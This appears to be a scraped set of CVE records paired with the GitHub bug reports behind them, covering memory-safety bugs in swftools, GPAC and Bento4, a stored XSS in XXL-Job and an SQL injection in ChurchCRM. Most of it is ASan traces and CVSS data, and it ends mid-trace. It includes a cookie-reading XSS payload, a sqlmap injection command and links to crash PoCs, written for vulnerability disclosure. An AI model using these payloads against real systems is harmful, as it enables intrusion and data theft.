{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/176" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/176
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==25679==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000d6a0 at pc 0x00000044059d bp 0x7fffffffd270 sp 0x7fffffffd260 WRITE of size 2 at 0x60600000d6a0 thread T0 #0 0x44059c in swf_FontExtract_DefineTextCallback modules/swftext.c:508 #1 0x449c46 in swf_FontExtract_DefineText modules/swftext.c:532 #2 0x44a355 in swf_FontExtract modules/swftext.c:617 #3 0x40c2dc in fontcallback2 /test/swftools-asan/src/swfdump.c:941 #4 0x4433c6 in swf_FontEnumerate modules/swftext.c:133 #5 0x409208 in main /test/swftools-asan/src/swfdump.c:1296 #6 0x7ffff68a683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #7 0x40c168 in _start (/test/swftools-asan/src/swfdump+0x40c168) 0x60600000d6a0 is located 0 bytes inside of 56-byte region [0x60600000d6a0,0x60600000d6d8) freed by thread T0 here: #0 0x7ffff6f022ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x47db2c in swf_ReadTag /test/swftools-asan/lib/rfxswf.c:1234 #2 0x541396 (/test/swftools-asan/src/swfdump+0x541396) previously allocated by thread T0 here: #0 0x7ffff6f0279a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a) #1 0x53318c in rfx_calloc /test/swftools-asan/lib/mem.c:69 #2 0x541396 (/test/swftools-asan/src/swfdump+0x541396) SUMMARY: AddressSanitizer: heap-use-after-free modules/swftext.c:508 swf_FontExtract_DefineTextCallback Shadow bytes around the buggy address: 0x0c0c7fff9a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9a90: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 fa 0x0c0c7fff9aa0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9ab0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9ac0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c0c7fff9ad0: fa fa fa fa[fd]fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff9ae0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9af0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa 0x0c0c7fff9b00: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9b10: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9b20: 00 00 00 04 fa fa fa fa 00 00 00 00 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==25679==ABORTING POC [swf_FontExtract_DefineTextCallback_uaf_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/swf_FontExtract_DefineTextCallback_uaf_poc)
heap-use-after-free exists in the function swf_FontExtract_DefineTextCallback in swftext.c
https://api.github.com/repos/swftools/swftools/issues/176/comments
1
2021-10-07T13:21:58Z
2022-05-31T23:28:37Z
https://github.com/swftools/swftools/issues/176
1,020,039,831
176
CVE-2021-42204
2022-06-02T14:15:30.127
An issue was discovered in swftools through 20201222. A heap-buffer-overflow exists in the function swf_GetBits() located in rfxswf.c. It allows an attacker to cause code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/169
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==28613==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000efdf at pc 0x00000047238d bp 0x7fffffffdbe0 sp 0x7fffffffdbd0 READ of size 1 at 0x60300000efdf thread T0 #0 0x47238c in swf_GetBits /test/swftools-asan/lib/rfxswf.c:213 #1 0x4346cc in swf_GetSimpleShape modules/swfshape.c:66 #2 0x443fbc in swf_FontExtract_DefineFont modules/swftext.c:163 #3 0x44a096 in swf_FontExtract modules/swftext.c:597 #4 0x40c2dc in fontcallback2 /test/swftools-asan/src/swfdump.c:941 #5 0x4433c6 in swf_FontEnumerate modules/swftext.c:133 #6 0x409208 in main /test/swftools-asan/src/swfdump.c:1296 #7 0x7ffff68a683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #8 0x40c168 in _start (/test/swftools-asan/src/swfdump+0x40c168) 0x60300000efdf is located 1 bytes to the left of 22-byte region [0x60300000efe0,0x60300000eff6) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x532fa7 in rfx_alloc /test/swftools-asan/lib/mem.c:30 #2 0x541396 (/test/swftools-asan/src/swfdump+0x541396) SUMMARY: AddressSanitizer: heap-buffer-overflow /test/swftools-asan/lib/rfxswf.c:213 swf_GetBits Shadow bytes around the buggy address: 0x0c067fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9df0: fa fa fa fa fa fa fd fd fd fd fa[fa]00 00 06 fa 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==28613==ABORTING POC [swf_GetBits_bof_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/swf_GetBits_bof_poc)
heap-buffer-overflow exists in the function swf_GetBits in rfxswf.c
https://api.github.com/repos/swftools/swftools/issues/169/comments
0
2021-10-07T13:00:58Z
2021-10-07T13:00:58Z
https://github.com/swftools/swftools/issues/169
1,020,017,571
169
CVE-2022-29770
2022-06-03T21:15:07.893
XXL-Job v2.3.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via /xxl-job-admin/jobinfo.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/2836" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "233AAF33-91ED-425F-951A-1DAAC0B3A4C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/xuxueli/xxl-job/issues/2836
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
### Which version of XXL-JOB do you using? 2.3.0 ### Expected behavior stroed XSS 1、Insert poc <script>alert(document.cookie)</script> ![image](https://user-images.githubusercontent.com/33409640/164911443-ae80fdc1-0fb8-4391-b1d1-fa83f50d624e.png) 2、press submit ![image](https://user-images.githubusercontent.com/33409640/164911508-a9c88111-2fbf-4835-89bd-69598fd53a28.png) 3、XSS attack occurs ![image](https://user-images.githubusercontent.com/33409640/164911605-e0eb3c35-7697-4c44-b29d-b3a3779d3cc3.png)
There is a stored XSS vulnerability in the task management of xxl-job
https://api.github.com/repos/xuxueli/xxl-job/issues/2836/comments
0
2022-04-23T15:02:41Z
2022-04-23T15:02:41Z
https://github.com/xuxueli/xxl-job/issues/2836
1,213,336,856
2,836
CVE-2022-31325
2022-06-08T16:15:08.693
There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/167483/ChurchCRM-4.4.5-SQL-Injection.html" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ChurchCRM/CRM/issues/6005" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325" }, { "source": "[email protected]", "tags": [ "Broken Link" ], "url": "https://www.nu11secur1ty.com/2022/06/cve-2022-31325.htm" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:churchcrm:churchcrm:4.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "11F0A498-A6CD-485B-B0E2-1B0A2E09A29F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ChurchCRM/CRM/issues/6005
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ChurchCRM", "CRM" ]
SQL Injection vulnerability in ChurchCRM 4.4.5 via /churchcrm/WhyCameEditor.php. Step to exploit: 1. Login as admin. 2. Redirect to profile page and click on `Edit "Why Came" Notes`. ![1](https://user-images.githubusercontent.com/35623498/168865685-a517909c-ba50-4f17-9b9f-cce5a357a2c3.PNG) 3. Submit "Why Came" notes and capture request in Burp Suite. ![2](https://user-images.githubusercontent.com/35623498/168865810-1732b19c-f2e8-426f-ad3f-4bd44a74b06b.PNG) 4. Save request to churchcrm.txt file and run sqlmap for injecting the PersonID parameter: `sqlmap -r churchcrm.txt -p PersonID` ![3](https://user-images.githubusercontent.com/35623498/168865953-18a306c8-92a2-43d8-bf9d-e78787b82e54.PNG) ![4](https://user-images.githubusercontent.com/35623498/168866427-70276955-96b1-4ad4-807b-0e9f71844746.PNG)
SQL Injection vulnerability in ChurchCRM 4.4.5 via /churchcrm/WhyCameEditor.php
https://api.github.com/repos/ChurchCRM/CRM/issues/6005/comments
7
2022-05-17T16:53:06Z
2024-03-25T17:49:20Z
https://github.com/ChurchCRM/CRM/issues/6005
1,238,916,903
6,005
CVE-2021-40592
2022-06-08T18:15:08.173
GPAC version before commit 71460d72ec07df766dab0a4d52687529f3efcf0a (version v1.0.1 onwards) contains loop with unreachable exit condition ('infinite loop') vulnerability in ISOBMFF reader filter, isoffin_read.c. Function isoffin_process() can result in DoS by infinite loop. To exploit, the victim must open a specially crafted mp4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/71460d72ec07df766dab0a4d52687529f3efcf0a" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1876" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA1FE1D-17AE-45F9-A7BD-A8316EE859D6", "versionEndExcluding": "1.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1876
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi. There is an infinite loop bug in MP4Box. to reproduce, follow the command below with the attachment file. ``` ./MP4Box -nhnt 1 hang_file -out /dev/nul ``` [hang_file.zip](https://github.com/gpac/gpac/files/6991064/hang_file.zip) Credit : ADLab of Venustech
Infinite Loop in MP4Box
https://api.github.com/repos/gpac/gpac/issues/1876/comments
0
2021-08-16T09:08:59Z
2021-08-30T15:33:42Z
https://github.com/gpac/gpac/issues/1876
971,526,752
1,876
CVE-2022-31282
2022-06-10T18:15:08.627
Bento4 MP4Dump v1.2 was discovered to contain a segmentation violation via an unknown address at /Source/C++/Core/Ap4DataBuffer.cpp:175.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/708" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "F7A3D679-CF47-47D3-AED0-94803AC18598", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/708
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
SUMMARY: AddressSanitizer: SEGV on unknown address 0x000000000000 in /Source/C++/Core/Ap4DataBuffer.cpp:175 - Version ``` $ ./mp4dump MP4 File Dumper - Version 1.2 (Bento4 Version 1.6.0.0) (c) 2002-2011 Axiomatic Systems, LLC ``` branch [d02ef82](https://github.com/axiomatic-systems/Bento4/commit/d02ef8230a8fee4904a750eb912521c5f1c74e0b) - Platform ``` $ gcc --version gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0 Copyright (C) 2019 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. $ uname -r 5.13.0-40-generic $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.4 LTS Release: 20.04 Codename: focal ``` - Steps to reproduce ``` $ mkdir build $ cd build $ cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" $ make $ ./mp4dump poc ``` - Asan ``` $ ./mp4dump poc [ftyp] size=8+16 major_brand = mk24 minor_version = 24017c compatible_brand = yl73 compatible_brand = oxsh [free] size=8+0 [mdat] size=8+397 AddressSanitizer:DEADLYSIGNAL ================================================================= ==2476501==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f73f2e09321 bp 0x7fffe8de6b70 sp 0x7fffe8de62e0 T0) ==2476501==The signal is caused by a READ memory access. ==2476501==Hint: address points to the zero page. #0 0x7f73f2e09320 in AddressIsPoisoned ../../../../src/libsanitizer/asan/asan_mapping.h:396 #1 0x7f73f2e09320 in QuickCheckForUnpoisonedRegion ../../../../src/libsanitizer/asan/asan_interceptors_memintrinsics.h:30 #2 0x7f73f2e09320 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790 #3 0x55719b16636b in AP4_DataBuffer::SetData(unsigned char const*, unsigned int) /home/wulearn/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:175 #4 0x55719b14744a in AP4_AvccAtom::AP4_AvccAtom(unsigned int, unsigned char const*) /home/wulearn/Bento4/Source/C++/Core/Ap4AvccAtom.cpp:176 #5 0x55719b1464ab in AP4_AvccAtom::Create(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4AvccAtom.cpp:95 #6 0x55719b140dc6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:513 #7 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #8 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #9 0x55719b1bfeea in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115 #10 0x55719b1c46f0 in AP4_VisualSampleEntry::AP4_VisualSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:884 #11 0x55719b1c5c2a in AP4_AvcSampleEntry::AP4_AvcSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:1136 #12 0x55719b13f203 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:319 #13 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x55719b1d5c90 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101 #15 0x55719b1d550f in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57 #16 0x55719b1409a6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458 #17 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #18 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #19 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #20 0x55719b150be7 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #21 0x55719b142358 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #22 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #23 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #24 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #25 0x55719b150be7 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #26 0x55719b142358 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #27 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #28 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #29 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #30 0x55719b150be7 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #31 0x55719b142358 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #32 0x55719b13e5ee in 